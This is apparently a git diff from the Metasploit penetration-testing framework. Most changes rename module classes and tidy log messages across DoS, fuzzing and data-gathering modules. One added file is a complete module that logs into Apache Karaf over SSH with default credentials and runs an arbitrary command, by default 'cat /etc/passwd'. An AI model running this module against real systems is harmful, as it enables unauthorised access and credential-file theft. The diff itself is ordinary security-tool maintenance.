Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb index 51fa2bab02..46aaf309f2 100644 --- a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb +++ b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp #include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb index 2ba38d2064..1b6a17314a 100644 --- a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb +++ b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb index d514712000..70abc3470a 100644 --- a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb +++ b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb index 72166cc782..97e837d932 100644 --- a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb +++ b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb b/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb index de18f018d1..1729724e16 100644 --- a/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb +++ b/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/tftp/pt360_write.rb b/modules/auxiliary/dos/windows/tftp/pt360_write.rb index 81f16d4860..6f15b331b3 100644 --- a/modules/auxiliary/dos/windows/tftp/pt360_write.rb +++ b/modules/auxiliary/dos/windows/tftp/pt360_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/tftp/solarwinds.rb b/modules/auxiliary/dos/windows/tftp/solarwinds.rb index 7be42e23eb..9c11bf9139 100644 --- a/modules/auxiliary/dos/windows/tftp/solarwinds.rb +++ b/modules/auxiliary/dos/windows/tftp/solarwinds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index 9eeb6b614a..a04ee8e064 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb +++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/chunked.rb b/modules/auxiliary/dos/wireshark/chunked.rb index fa78ad8a42..3cb3a0a4a3 100644 --- a/modules/auxiliary/dos/wireshark/chunked.rb +++ b/modules/auxiliary/dos/wireshark/chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/cldap.rb b/modules/auxiliary/dos/wireshark/cldap.rb index 63c678cc06..edbef44b07 100644 --- a/modules/auxiliary/dos/wireshark/cldap.rb +++ b/modules/auxiliary/dos/wireshark/cldap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/ldap.rb b/modules/auxiliary/dos/wireshark/ldap.rb index ee3f9bd317..f56c69f873 100644 --- a/modules/auxiliary/dos/wireshark/ldap.rb +++ b/modules/auxiliary/dos/wireshark/ldap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb index 2d81a8f2c6..134bb40878 100644 --- a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb +++ b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'bit-struct' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/fuzzers/ftp/client_ftp.rb b/modules/auxiliary/fuzzers/ftp/client_ftp.rb index f28388b2f2..d351b927a6 100644 --- a/modules/auxiliary/fuzzers/ftp/client_ftp.rb +++ b/modules/auxiliary/fuzzers/ftp/client_ftp.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Exploit::Remote::TcpServer diff --git a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb index 00cf7bcdf5..6901b150b8 100644 --- a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb +++ b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb index b115f6dd62..737baefe67 100644 --- a/modules/auxiliary/fuzzers/http/http_form_field.rb +++ b/modules/auxiliary/fuzzers/http/http_form_field.rb @@ -11,7 +11,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -538,7 +538,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Done fuzzing fields in form #{thisform[:name].upcase.strip}") end # fuzz headers ? - if datastore['FUZZHEADERS'] == true + if datastore['FUZZHEADERS'] print_status("Fuzzing header fields") do_fuzz_headers(thisform,response.headers) end diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb index 7dfe8a5d26..9aa76fb03e 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb index 7f186ec68a..ef23f1f7e5 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb index 922de4aa88..3d7168f45e 100644 --- a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb +++ b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntp' require 'securerandom' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Fuzzer include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb index a6b195bf44..d9ab59f73c 100644 --- a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb index 5d4486fc5e..2cca415efe 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb index 17ae41ffde..a7779eb25f 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb index a47564f63f..43f2f3d00c 100644 --- a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb index 22b0824f1f..fbd70d10d0 100644 --- a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb index a8eec1e014..78fabd2f8d 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb index de640033a7..e8e1e0a081 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb index 607d774e18..4f8e978363 100644 --- a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb +++ b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb index 23d1f9cb56..6f14b476c8 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb index fb5cad0492..ab17f04b9b 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb index fbb1368b86..c08d8075ee 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb index 658ecdee4a..3f3c58f872 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb index 9074760d1c..c65762796b 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/tds/tds_login_username.rb b/modules/auxiliary/fuzzers/tds/tds_login_username.rb index 611c33d0ca..0f8d5520de 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_username.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_username.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb index 353e0dbbf5..06aa0639ed 100644 --- a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb +++ b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -48,20 +48,20 @@ class Metasploit4 < Msf::Auxiliary def run - print_status("#{peer} - Get a valid session cookie...") + print_status("Get a valid session cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php') }) unless res and res.code == 200 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve a cookie") + print_error("Could not retrieve a cookie") return end @@ -73,7 +73,7 @@ class Metasploit4 < Msf::Auxiliary 'pass' => Rex::Text.encode_base64(datastore['PASSWORD']) } - print_status("#{peer} - Login...") + print_status("Login...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'), @@ -83,19 +83,19 @@ class Metasploit4 < Msf::Auxiliary }) unless res and res.code == 302 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/') - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve the authenticated cookie") + print_error("Could not retrieve the authenticated cookie") return end @@ -105,7 +105,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(6) right_marker = Rex::Text.rand_text_alpha(6) - print_status("#{peer} - Exploiting SQLi...") + print_status("Exploiting SQLi...") loop do file = sqli(left_marker, right_marker, i, cookie, filename) diff --git a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb index 353e7ce052..3fc5e20342 100644 --- a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb +++ b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -48,20 +48,20 @@ class Metasploit4 < Msf::Auxiliary def run - print_status("#{peer} - Get a valid session cookie...") + print_status("Get a valid session cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php') }) unless res && res.code == 200 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve a cookie") + print_error("Could not retrieve a cookie") return end @@ -73,7 +73,7 @@ class Metasploit4 < Msf::Auxiliary 'pass' => Rex::Text.encode_base64(datastore['PASSWORD']) } - print_status("#{peer} - Login...") + print_status("Login...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'), @@ -83,19 +83,19 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.code == 302 - print_error("#{peer} - Server did not respond in an expected way") + print_error("Server did not respond in an expected way") return end unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/') - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end cookie = res.get_cookies if cookie.blank? - print_error("#{peer} - Could not retrieve the authenticated cookie") + print_error("Could not retrieve the authenticated cookie") return end @@ -106,7 +106,7 @@ class Metasploit4 < Msf::Auxiliary right_marker = Rex::Text.rand_text_alpha(6) sql_true = Rex::Text.rand_text_alpha(6) - print_status("#{peer} - Exploiting SQLi...") + print_status("Exploiting SQLi...") begin ::Timeout.timeout(datastore['SQLI_TIMEOUT']) do @@ -124,9 +124,9 @@ class Metasploit4 < Msf::Auxiliary end rescue ::Timeout::Error if full.blank? - print_error("#{peer} - Timeout while exploiting sqli, nothing recovered") + print_error("Timeout while exploiting sqli, nothing recovered") else - print_error("#{peer} - Timeout while exploiting sqli, #{full.length} bytes recovered") + print_error("Timeout while exploiting sqli, #{full.length} bytes recovered") end return end diff --git a/modules/auxiliary/gather/android_browser_file_theft.rb b/modules/auxiliary/gather/android_browser_file_theft.rb index f0b00f0fe1..aca3bdc41b 100644 --- a/modules/auxiliary/gather/android_browser_file_theft.rb +++ b/modules/auxiliary/gather/android_browser_file_theft.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb b/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb index f87821d32b..266575bff8 100644 --- a/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb +++ b/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_htmlfileprovider.rb b/modules/auxiliary/gather/android_htmlfileprovider.rb index c8edc3c0ed..339a2f01b6 100644 --- a/modules/auxiliary/gather/android_htmlfileprovider.rb +++ b/modules/auxiliary/gather/android_htmlfileprovider.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_object_tag_webview_uxss.rb b/modules/auxiliary/gather/android_object_tag_webview_uxss.rb index bebf1f081f..3c3bce84f1 100644 --- a/modules/auxiliary/gather/android_object_tag_webview_uxss.rb +++ b/modules/auxiliary/gather/android_object_tag_webview_uxss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::JSObfu diff --git a/modules/auxiliary/gather/android_stock_browser_uxss.rb b/modules/auxiliary/gather/android_stock_browser_uxss.rb index 887dcea57d..4296dbb238 100644 --- a/modules/auxiliary/gather/android_stock_browser_uxss.rb +++ b/modules/auxiliary/gather/android_stock_browser_uxss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apache_karaf_command_execution.rb b/modules/auxiliary/gather/apache_karaf_command_execution.rb new file mode 100644 index 0000000000..5120544133 --- /dev/null +++ b/modules/auxiliary/gather/apache_karaf_command_execution.rb @@ -0,0 +1,136 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Module::Deprecated + + deprecated(Date.new(2016, 4, 14), 'auxiliary/scanner/ssh/apache_karaf_command_execution') + + def initialize(info={}) + super(update_info(info, + 'Name' => "Apache Karaf Default Credentials Command Execution", + 'Description' => %q{ + This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x. + The 'karaf' user has a known default password, which can be used to login to the + SSH service, and execute operating system commands from remote. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nicholas Starke ' + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Apache Karaf', {}], + ], + 'Privileged' => true, + 'DisclosureDate' => "Feb 9 2016", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8101), + OptString.new('USERNAME', [true, 'Username', 'karaf']), + OptString.new('PASSWORD', [true, 'Password', 'karaf']), + OptString.new('CMD', [true, 'Command to Run', 'cat /etc/passwd']) + ], self.class + ) + + register_advanced_options( + [ + Opt::Proxies, + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + def rport + datastore['RPORT'] + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def cmd + datastore['CMD'] + end + + def do_login(user, pass, ip) + opts = { + :auth_methods => ['password'], + :msframework => framework, + :msfmodule => self, + :port => rport, + :disable_agent => true, + :config => false, + :password => pass, + :record_auth_info => true, + :proxies => datastore['Proxies'] + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(ip, user, opts) + end + rescue OpenSSL::Cipher::CipherError => e + print_error("#{ip}:#{rport} SSH - Unable to connect to this Apache Karaf (#{e.message})") + return + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{ip}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{ip}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{ip}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{ip}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh + print_good("#{ip}:#{rport}- Login Successful with '#{user}:#{pass}'") + else + print_error "#{ip}:#{rport} - Unknown error" + end + ssh + end + + def run_host(ip) + print_status("#{ip}:#{rport} - Attempt to login...") + ssh = do_login(username, password, ip) + if ssh + output = ssh.exec!("shell:exec #{cmd}\n").to_s + if output + print_good("#{ip}:#{rport} - Command successfully executed. Output: #{output}") + store_loot("apache.karaf.command", + "text/plain", + ip, + output) + vprint_status("#{ip}:#{rport} - Loot stored at: apache.karaf.command") + else + print_error "#{ip}:#{rport} - Command failed to execute" + end + end + end +end \ No newline at end of file diff --git a/modules/auxiliary/gather/apache_rave_creds.rb b/modules/auxiliary/gather/apache_rave_creds.rb index eb9574bbff..320bc12a25 100644 --- a/modules/auxiliary/gather/apache_rave_creds.rb +++ b/modules/auxiliary/gather/apache_rave_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb index af2359c05b..b754e67c55 100644 --- a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb +++ b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/service_manager' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report @@ -172,7 +172,7 @@ class Metasploit3 < Msf::Auxiliary # set. # def use_zlib - unless Rex::Text.zlib_present? || datastore['HTTP::compression'] == false + unless Rex::Text.zlib_present? || !datastore['HTTP::compression'] fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!") end end diff --git a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb index 98d347f89d..05dd9a693a 100644 --- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb +++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/format/webarchive' require 'uri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/gather/avtech744_dvr_accounts.rb b/modules/auxiliary/gather/avtech744_dvr_accounts.rb index 4c37acb610..632127d02d 100644 --- a/modules/auxiliary/gather/avtech744_dvr_accounts.rb +++ b/modules/auxiliary/gather/avtech744_dvr_accounts.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/browser_info.rb b/modules/auxiliary/gather/browser_info.rb new file mode 100644 index 0000000000..3279767ded --- /dev/null +++ b/modules/auxiliary/gather/browser_info.rb @@ -0,0 +1,85 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "HTTP Client Information Gather", + 'Description' => %q{ + This module gathers information about a browser that exploits might be interested in, such + as OS name, browser version, plugins, 